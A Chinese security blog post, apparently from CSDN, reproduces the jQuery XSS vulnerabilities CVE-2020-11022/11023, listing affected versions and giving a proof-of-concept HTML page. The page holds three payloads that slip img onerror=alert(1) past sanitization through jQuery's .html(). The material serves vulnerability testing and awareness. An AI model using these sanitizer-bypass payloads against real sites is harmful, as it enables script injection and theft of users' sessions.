JQuery XSS漏洞(CVE-2020-11022/11023)

最新推荐文章于 2024-05-14 17:29:15 发布
最新推荐文章于 2024-05-14 17:29:15 发布
阅读量2.7k 收藏 4
点赞数 1
分类专栏: 渗透测试 文章标签: jquery xss javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZPFCD/article/details/122576843
版权

该漏洞源于WEB应用缺少对客户端数据的正确验证。

影响版本:

 1.2.0 <= jquery < V 3.5.0

测试代码:

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</title>
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.js"></script>
</head>
<body>

<!--

漏洞影响:V 1.2.0 <= jquery < V 3.5.0

-->
<script>
function test(n,jq){
    sanitizedHTML = document.getElementById('poc'+n).innerHTML;
    if(jq){
        $('#div').html(sanitizedHTML);
    }else{
        div.innerHTML=sanitizedHTML;
    }
}
</script>
<h1>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</h1>
<p>PoCs of XSS bugs fixed in <a href="//blog.jquery.com/2020/04/10/jquery-3-5-0-released/">jQuery 3.5.0</a>. You can find the details in my blog post: <a href="//mksben.l0.cm/2020/05/jquery3.5.0-xss.html">English</a> / <a href="//masatokinugawa.l0.cm/2020/05/jquery3.5.0-xss.html">日本語</a></p>

<h2>PoC 1</h2>
<button onclick="test(1)">Assign to innerHTML</button> <button onclick="test(1,true)">Append via .html()</button>
<xmp id="poc1">
<style><style /><img src=x onerror=alert(1)> 
</xmp>

<h2>PoC 2 (Only jQuery 3.x affected)</h2>
<button onclick="test(2)">Assign to innerHTML</button> <button onclick="test(2,true)">Append via .html()</button>
<xmp id="poc2">
<img alt="<x" title="/><img src=x onerror=alert(1)>">
</xmp>

<h2>PoC 3</h2>
<button onclick="test(3)">Assign to innerHTML</button> <button onclick="test(3,true)">Append via .html()</button>
<xmp id="poc3">
<option><style></option></select><img src=x onerror=alert(1)></style>
</xmp>

<div id="div"></div>
</body>
</html>

K2epUp
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
复现CVE-2020-11022/11023jQuery XSS漏洞
记录并分享学习安全的知识点..
05-31 5885
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、漏洞描述 由于执行了消毒(sanitize)处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),从而导致xss漏洞。 二、影响版本 大于或等于1.2且在3.5.0之前的jQuery版本中 三、漏洞复现 poc如下: <!DOCTYPE html> <html> <head> &lt...
升级Jquery版本,解决低版本安全漏洞
weixin_45394033的博客
10-21 7823
Jquery 低版本存在安全漏洞,所以需要升级版本记录 jQuery 1.12.3 升级到 v3.x。
jQuery-XSS漏洞CVE-2020-11022 CVE-2020-11023)_cve-2020-11023复现
最新发布
2401_85013983的博客
05-14 472
【代码】jQuery-XSS漏洞CVE-2020-11022 CVE-2020-11023)_cve-2020-11023复现。
jQuery版本低引起的漏洞——CVE-2020-11022/CVE-2020-11023
热门推荐
Tracts的博客
03-10 2万+
jQuery版本低引起的漏洞——CVE-2020-11022/CVE-2020-11023 漏洞号:CVE-2020-11022/CVE-2020-11023 影响范围:jQuery >= 1.0.3 < 3.5.0 漏洞原理 见:jQuery最新xss漏洞分析——CVE-2020-11022/11023 - 云+社区 - 腾讯云 (tencent.com) 漏洞复现 https://vulnerabledoma.in/jquery_htmlPrefilter_xss.html 要想在项目本地实
jQuery-XSS漏洞CVE-2020-11022/CVE-2020-11023
1stPeak's Blog
03-25 2万+
jQuery-XSS漏洞CVE-2020-11022/CVE-2020-11023
最新版jQuery v3.3.1的BUG以及解决办法(什么问题不重要,怎么解决问题才重要)...
weixin_34166472的博客
09-12 801
发现问题 最新版的 FineUIPro v5.2.0 中,我们将内置的 jQuery v1.12.4 升级到 jQuery v3.3.1 ,可以看升级记录: +升级到jQuery v3.3.1。    -jQuery v3.x支持的浏览器:Chrome,Edge,Firefox,Safari,IE9+。    -增加类型JSLibrary枚举值JQv1,用来引入jQuery v1.x。  ...
安全生产:CVE-2020-11022/CVE-2020-11023漏洞解析
IT全栈 华强工作室
09-07 3513
代码安全扫描阶段,前端资源审计发现jQuery版本过低导致生产系统存在类风险。该类风险为应用安全缺陷类DXSS攻击,攻击者可以利用该漏洞注入恶意脚本代码,并在受害者的浏览器上执行。将导致受害者的个人信息泄露、账户被劫持、会话被劫持等安全问题。科运中心给出的解决方案是升级jQuery版本至3.5.0或更高版本。
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
CVE-2020:2020一些突破
03-08
CVE-2020-5404(Spring Cloud Gateway)是Java框架Spring Cloud Gateway的一个漏洞,攻击者可以利用它进行跨站脚本(XSS)攻击,通过注入恶意脚本来窃取用户信息或者执行其他恶意操作。 CVE-2020-5902(Joomla! CMS...
anti-xss:AntiAntiXSS | 通过PHP防止跨站点脚本(XSS
05-02
:Japanese_secret_button: 反XSS “跨站点脚本(XSS)是一种通常在Web应用程序中发现的计算机安全漏洞XSS使攻击者能够将客户端脚本注入到其他用户查看的网页中。跨站点脚本漏洞可能被攻击者用来绕过相同原产地策略...
jQuery v3.4.1
10-28
jQuery 是一个JavaScript 库,它有助于简化 JavaScript 以及 Asynchronous JavaScript + XML (Ajax) 编程。与类似的 JavaScript 库不同,jQuery 具有独特的基本原理,可以简洁地表示常见的复杂代码。学习 jQuery 基本原理,探索其特性和功能,执行一些常见的 Ajax 任务并掌握如何使用插件扩展jQuery。 压缩包中包含了jquery-3.4.1.min.js 和jquery-3.4.1.js
jquery-3.4.1_jquery_3.4.1.js_jquery-3.4.1_sangat1_jquery3.4.1_jq
09-30
jquery.js web开发使用,js文件
coldfusion-10-11-xss:CVE-2015-0345 (APSB15-07) 的概念验证代码
05-31
此存储库包含 CVE-2015-0345 (APSB15-07) 的 XSS 向量,允许在 ColdFusion 安装上获得远程命令执行。 此漏洞仅对 ColdFusion 10 和 11 安装有效。 具体来说,ColdFusion 11, Update 11 和 ColdFusion 10, Update 16...
jquery版本安全漏洞问题
辉少的博客
11-12 2万+
起因: 公司一次常规安全扫描提出了jquery版本漏洞问题: 1.x系列版本等于或低于1.12的jQuery,和2.x系列版本等于或低于2.2的jQuery,过滤用户输入数据所使用的正则表达式存在缺陷,可能导致LOCATION.HASH跨站漏洞。(漏洞官方修复介绍:http://bugs.jquery.com/ticket/9521) 正确解决方法:升级版本。 但是,最新版本的jquery...
checkmarx检测js中的jQuery安全漏洞
tang31415926的博客
12-29 2394
checkmarx安全漏洞检测问题(javascript)处理
最新版jQuery v3.3.1的BUG以及解决办法(什么问题不重要,怎么解决问题才重要)
zhengxiuchen86的博客
06-05 151
最新版jQuery v3.3.1的BUG以及解决办法(什么问题不重要,怎么解决问题才重要)
JqueryJQuery3.3.1版本中使用attr()复选框全选无效!
分享我的点点滴滴,在成长路上与你同行!
01-15 518
注意: 在JQuery3.3.1版本            使用 $('[type=checkbox]:checkbox').attr('checked', true);            单击按钮无效哦!   那么使用: .prop() 获取匹配的元素集中第一个元素的属性(property)值或设置每一个匹配元素的一个或多个属性。 Contents: .prop( proper...
js-xss-master/dist/test.html
10-02
js-xss-master/dist/test.html是js-xss库的一个测试页面。 js-xss是一个用于防御跨站点脚本攻击(XSS)的JavaScript库。它通过对输入的 HTML 进行过滤和转义,确保只有被允许的标签和属性能够被渲染,阻止恶意脚本的执行。 test.html是用来测试js-xss库功能的一个页面。在这个页面中,可以输入一段HTML代码,并点击"Filter"按钮,来看过滤后的结果。通过测试页面,可以验证js-xss库是否能够正确地对输入的HTML代码进行过滤,并防止XSS攻击。 在进行测试时,我们可以输入一些常见的XSS攻击向量,如 ```<script>alert('xss')</script>``` ,然后点击"Filter"按钮,观察过滤结果是否能够消除恶意脚本,并保留合法的HTML标签和属性。 js-xss库的使用对于提高网站的安全性非常重要,它可以防止攻击者通过注入恶意脚本来窃取用户的信息、篡改页面内容等恶意行为。对于开发者来说,使用js-xss库可以辅助实现对用户输入的安全过滤,有效地提升网站的安全性。 总之,js-xss-master/dist/test.html是js-xss库提供的一个测试页面,用于验证库的功能是否正常,能够有效地防御XSS攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

K2epUp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值